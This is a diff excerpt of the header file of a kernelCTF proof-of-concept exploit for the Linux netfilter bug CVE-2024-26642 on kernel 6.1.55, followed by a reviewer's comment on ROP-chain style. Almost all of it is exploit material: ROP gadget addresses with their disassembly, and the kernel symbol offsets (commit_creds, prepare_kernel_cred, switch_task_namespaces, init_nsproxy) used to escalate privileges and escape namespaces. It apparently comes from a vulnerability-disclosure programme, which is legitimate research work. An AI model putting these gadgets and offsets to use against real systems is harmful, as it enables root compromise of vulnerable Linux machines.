pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55/poc.h

```diff
@@ -0,0 +1,705 @@
+}
+#define PANIC_IF(x) if ((x)) { \
+    perror(#x); \
+    exit(errno); \
+}
+#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))
+
+inline static int _pin_to_cpu(int id) {
+  cpu_set_t set;
+  CPU_ZERO(&set);
+  CPU_SET(id, &set);
+  return sched_setaffinity(getpid(), sizeof(set), &set);
+}
+
+#define MY_TABLE "foo_tab", strlen("foo_tab")
+#define MY_SET "foo_set", strlen("foo_set")
+#define CHAIN_A "chainA", strlen("chainA")
+#define CHAIN_B "chainB", strlen("chainB")
+
+#define MY_KEY_LEN 16
+#define MY_KEY "keykeykeykeykeyk", MY_KEY_LEN
+
+//
+// offsets
+//
+
+// ffffffff81e09097: push rdi; jmp qword ptr [rsi+0xf]; 	4c57ff660f
+u64 push_rdi_jmp_rsi_0xf = 0xffffffff81e09097;
+
+// ffffffff8126df29: pop rsp; add rsp, 0x20; pop rbx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5c4883c4205be94c6d1901c3
+u64 pop_rsp_add_rsp_0x20_pop_rbx = 0xffffffff8126df29;
+
+// ffffffff81251258: pop rdx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5ae9223a1b01c3
+u64 pop_rdx = 0xffffffff81251258;
+// ffffffff818180b4: pop rbp; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5de9c6cbbe00c3
+u64 pop_rbp = 0xffffffff818180b4;
+
+// ffffffff8102871c: pop rcx; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	59e95ec53d01c3
+u64 pop_rcx = 0xffffffff8102871c;
+// ffffffff818344a5: push rax; jmp qword ptr [rcx]; 	50ff21
+u64 push_rax_jmp_rcx = 0xffffffff818344a5;
+// ffffffff81dadf48: pop rsp; jmp qword ptr [rsi+0xf]; 	5cff660f
+u64 pop_rsp_jmp_rsi_0xf = 0xffffffff81dadf48;
+
+// ffffffff81bc9099: lea rax, [r12+rbp]; pop rbx; pop rbp; pop r12; pop r13; pop r14; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	498d042c5b5d415c415d415ee9d6bb8300c3
+u64 lea_rax_r12_plus_rbp_pop5 = 0xffffffff81bc9099;
+
+// ffffffff812f9168: pop rdi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5fe912bb1001c3
+u64 pop_rdi = 0xffffffff812f9168;
+
+// ffffffff8124f56d:       48 89 c7                mov    %rax,%rdi
+// ffffffff8124f570:       48 89 3d d1 b9 23 03    mov    %rdi,0x323b9d1(%rip)        # ffffffff8448af48 <vmcoreinfo_data_safecopy>
+// ffffffff8124f577:       e9 04 57 1b 01          jmp    ffffffff82404c80 <__x86_return_thunk>
+u64 mov_rdi_rax = 0xffffffff8124f56d;
+
+// ffffffff81bd1748: pop rsi; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	5ee932358300c3
+u64 pop_rsi = 0xffffffff81bd1748;
+
+// function trailer for nft_do_chain
+u64 nft_do_chain_leave = 0xffffffff81e517eb;
+
+// we use this for the fast path to copy some data from the skb into RSI
+u64 nft_payload_fast_ops = 0xffffffff82b27580;
+
+u64 find_task_by_vpid = 0xffffffff811bbe60;
+u64 switch_task_namespaces = 0xffffffff811c3a30;
+u64 commit_creds = 0xffffffff811c55a0;
+u64 prepare_kernel_cred = 0xffffffff811c5840;
+u64 init_task = 0xffffffff83815a40;
+u64 init_nsproxy = 0xffffffff83876720;
+
+// ffffffff810ebbdd: add rsp, 0x88; jmp __x86_return_thunk (0xffffffff82404c80); ret; 	4881c488000000e997903101c3
+u64 add_rsp_0x88 = 0xffffffff810ebbdd;
+
+
+#define FOR_ALL_OFFSETS(x) do { \
```

Comment:
This logic seems to be overly complicated. We prefer this format better: https://google.github.io/security-research/kernelctf/style_guide#rop-chains